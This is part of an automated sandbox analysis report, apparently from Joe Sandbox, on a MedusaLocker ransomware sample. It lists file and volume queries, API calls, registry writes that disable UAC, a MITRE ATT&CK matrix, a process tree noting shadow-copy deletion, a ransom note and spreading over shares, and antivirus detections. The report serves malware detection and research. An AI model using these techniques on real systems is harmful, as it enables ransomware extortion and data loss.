                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft Help\MS.LYNC.16.1033.hxn VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\pt-PT\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft Help\MS.MSOUC.16.1033.hxn VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\pt-PT\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft Help\MS.MSPUB.16.1033.hxn VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\qps-ploc\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft Help\nslist.hxl VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\ro-RO\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\ro-RO\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\ru-RU\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\ru-RU\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\ru-RU\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\sk-SK\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\sk-SK\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\USOShared\Logs\NotifyIcon.001.etl VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\USOShared\Logs\NotifyIcon.002.etl VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\sl-SI\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\USOShared\Logs\NotifyIcon_Temp.1.etl VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\sl-SI\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\USOShared\Logs\UpdateUx_Temp.1.etl VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\sr-Latn-RS\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\sr-Latn-RS\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1 VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\sv-SE\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\sv-SE\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\sv-SE\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\IdentityCRL\INT\wlidsvcconfig.xml VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\tr-TR\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\IdentityCRL\production\wlidsvcconfig.xml VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\tr-TR\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\tr-TR\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\uk-UA\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edbres00001.jrs VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\uk-UA\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\winsipolicy.p7b VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edbres00002.jrs VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\zh-CN\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\zh-CN\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\zh-CN\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\zh-TW\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\zh-TW\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\zh-TW\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\OFFICE\DocumentRepository.ico VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\BOOTSTAT.DAT VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\Fonts\chs_boot.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\OFFICE\SharePointPortalSite.ico VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\Fonts\cht_boot.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\OFFICE\SharePointTeamSite.ico VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\Fonts\jpn_boot.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edb.jcp VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\Fonts\kor_boot.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edb.jtx VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\malgunn_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edbtmp.jtx VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\malgun_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.chk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\meiryon_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\meiryo_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00001.log VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\msjhn_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00001.jrs VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\msjh_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00002.jrs VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\msyhn_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbtmp.log VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\msyh_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\segmono_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\segoen_slboot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\segoe_slboot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\wgl4_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Resources\en-US\bootres.dll.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\BCD.LOG1 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\BCD.LOG2 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Recovery\BCD VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Recovery\BCD.LOG VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Recovery\BCD.LOG1 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Recovery\BCD.LOG2 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Boot\bootx64.efi VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\defaultuser0.dat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\guest.png VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user.dat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\pratesh.dat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user-192.png VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user-32.png VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user-40.png VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user-48.png VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user.bmp VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user.png VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\AppxProvisioning.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrc.idx VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu Places\05 - Music.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu Places\06 - Pictures.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu Places\07 - Videos.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu Places\09 - Network.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows Defender\Scans\MpDiag.bin VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.DATABASECOMPARE.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.LYNC_BASIC.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.LYNC_ONLINE.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.MSACCESS.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.ONENOTE.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.OUTLOOK.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.POWERPNT.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.SETLANG.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.SKYPEFB.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.SKYPEFB_BASIC.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.SKYPEFB_ONLINE.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.SKYPEFB_ONLINEG.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.SPREADSHEETCOMPARE.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.WINWORD.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Quick Assist.lnk VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: EnumSystemLocalesW, 1_2_00EB115C
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 1_2_00EB990B
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: EnumSystemLocalesW, 1_2_00EB9297
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: EnumSystemLocalesW, 1_2_00EB924C
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: EnumSystemLocalesW, 1_2_00EB9332
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: GetLocaleInfoW, 1_2_00EB16D5
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 1_2_00EB8FAA
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_00EB9736
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E89C2B cpuid, 1_2_00E89C2B
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E772E0 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime, 1_2_00E772E0

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA; SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ConsentPromptBehaviorAdmin, 1_2_00E70BB0
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
1 Replication Through Removable Media | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | 1 Taint Shared Content | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 11 Data Encrypted for Impact
Default Accounts | 1 Service Execution | 1 Windows Service | 1 Bypass User Access Control | 1 Obfuscated Files or Information | LSASS Memory | 11 Peripheral Device Discovery | 1 Replication Through Removable Media | Data from Removable Media | Exfiltration Over Bluetooth | 21 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | 1 Scheduled Task/Job | 1 Windows Service | 1 Software Packing | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | 1 Registry Run Keys / Startup Folder | 12 Process Injection | 1 DLL Side-Loading | NTDS | 34 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | 1 Bootkit | 1 Scheduled Task/Job | 1 Bypass User Access Control | LSA Secrets | 121 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | 1 Registry Run Keys / Startup Folder | 1 File Deletion | Cached Domain Credentials | 3 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Bootkit | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Behavior Graph

Behavior Graph ID: 791695; Sample: 98j0BL6iLT.exe; Startdate: 25/01/2023; Architecture: WINDOWS; Score: 100

Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 9 other signatures

Process tree recovered from the graph:

98j0BL6iLT.exe (started; graph counters 503, 101)
  DNS/IP: 192.168.2.1, 274 (unknown, unknown); 192.168.2.10 (unknown, unknown); 98 other IPs or domains
  Dropped: Z:\Recovery\...\Winre.wim.onelock (copy), DOS; C:\Users\user\AppData\Roaming\svhost.exe, PE32; C:\Recovery\WindowsRE\Winre.wim, DOS; 49 other malicious files
  Signatures: Deletes shadow drive data (may be related to ransomware); Writes a notice file (html or txt) to demand a ransom; Spreads via windows shares (copies files to share folders); 2 other signatures
  Child processes: WMIC.exe (started); WMIC.exe (started); WMIC.exe (started); 3 other processes
    Each WMIC.exe and each of the 3 other processes starts a conhost.exe (six conhost.exe instances in total)

svhost.exe (started)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Contains functionality to bypass UAC (CMSTPLUA); 2 other signatures

Initial Sample

Source | Detection | Scanner | Label
98j0BL6iLT.exe | 90% | ReversingLabs | Win32.Ransomware.MedusaLocker
98j0BL6iLT.exe | 74% | Virustotal |
98j0BL6iLT.exe | 100% | Avira | HEUR/AGEN.1213242
98j0BL6iLT.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\svhost.exe | 100% | Avira | HEUR/AGEN.1213242
C:\Users\user\AppData\Roaming\svhost.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\svhost.exe | 90% | ReversingLabs | Win32.Ransomware.MedusaLocker

Unpacked PE Files

Source | Detection | Scanner | Label
0.3.98j0BL6iLT.exe.3415240.6.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.3.98j0BL6iLT.exe.3277c40.15.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.0.svhost.exe.e50000.0.unpack | 100% | Avira | HEUR/AGEN.1213242
0.3.98j0BL6iLT.exe.3456c40.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.0.98j0BL6iLT.exe.9d0000.0.unpack | 100% | Avira | HEUR/AGEN.1213242
1.2.svhost.exe.e50000.0.unpack | 100% | Avira | HEUR/AGEN.1213242
                        No Antivirus matches
Source | Detection | Scanner | Label
http://www.flexerasoftware.com0 | 0% | URL Reputation | safe
http://ocsp.thawte.com0 | 0% | URL Reputation | safe
http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl | 0% | Avira URL Cloud | safe
